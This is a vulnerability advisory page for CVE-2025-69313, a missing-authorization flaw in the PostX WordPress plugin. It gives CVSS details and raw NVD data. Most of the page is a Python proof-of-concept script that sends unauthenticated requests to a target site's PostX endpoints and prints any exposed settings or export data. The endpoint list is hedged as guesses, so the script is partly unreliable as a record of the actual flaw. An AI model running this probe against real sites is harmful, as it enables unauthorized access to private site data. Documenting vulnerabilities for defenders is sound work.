Security Vulnerability Report
中文
CVE-2025-69313 CVSS 7.5 HIGH

CVE-2025-69313

Published: 2026-01-22 17:16:27
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PostX: from n/a through <= 5.0.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PostX Ultimate Post <= 5.0.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69313 PoC - PostX Missing Authorization # Target: WordPress site with PostX plugin <= 5.0.3 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-69313 This PoC demonstrates unauthorized access to protected PostX endpoints """ # Common PostX API endpoints that may be vulnerable endpoints = [ '/wp-json/postx/v1/', '/wp-json/postx/v1/settings', '/wp-json/postx/v1/posts', '/wp-admin/admin-ajax.php?action=postx_get_posts', '/wp-admin/admin-ajax.php?action=postx_export_data' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-69313: PostX Missing Authorization Check\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Request without authentication cookies headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) CVE-2025-69313-PoC', 'Content-Type': 'application/json' } try: response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for sensitive data exposure if 'settings' in endpoint or 'export' in endpoint: print(f" [!] VULNERABLE: Unauthorized access to sensitive endpoint!") print(f" Response preview: {response.text[:200]}...") elif response.status_code == 401: print(f" [+] Protected (401 Unauthorized)") elif response.status_code == 403: print(f" [+] Protected (403 Forbidden)") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("\n[*] Note: This PoC checks for authorization bypass.") print("[*] If vulnerable, unauthorized users can access protected data.") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69313", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:26.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PostX: from n/a through <= 5.0.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en WPXPO PostX ultimate-post permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a PostX: desde n/a hasta &lt;= 5.0.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-5-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}